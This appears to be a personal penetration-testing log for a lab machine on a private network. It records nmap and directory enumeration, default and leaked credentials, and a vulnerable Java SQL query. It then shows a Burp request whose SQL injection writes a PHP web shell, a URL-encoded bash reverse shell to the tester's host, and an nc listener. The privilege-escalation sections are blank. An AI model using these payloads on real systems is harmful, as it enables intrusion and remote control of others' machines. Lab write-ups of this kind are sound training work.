Hawat

๐Ÿงช Pentest Log: {{date:2025-07-31}}

๐Ÿ” Target Information

ip=192.168.148.147

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 17445

Web Content Enumeration

gobuster dir -u http://$ip:17445 -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip:17445 -r -o dirsearch.txt

Port 30455

Port 50080

Web Content Enumeration

gobuster dir -u http://$ip:17445 -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip:17445 -r -o dirsearch.txt

found /cloud directory, login with

admin:admin

download issuetracker.zip

issue_user:ManagementInsideOld797

analyze the zip, found SQLI vuln within IssueController.java

        try {
			conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);
		    String query = "SELECT message FROM issue WHERE priority='"+priority+"'";

๐Ÿ’ฃ Exploitation / Foothold

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

burpsuite

POST /issue/checkByPriority?priority=High%27+UNION+SELECT+%27%3C%3Fphp+echo+system%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+ HTTP/1.1
Host: 192.168.148.147:17445
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=02F50E9F91BAD930D9FFC52BC97814A0
Upgrade-Insecure-Requests: 1
Priority: u=0, i

http://192.168.148.147:30455/cmd.php?cmd=%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.163%2F30455%200%3E%261

nc -lvnp 30455

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps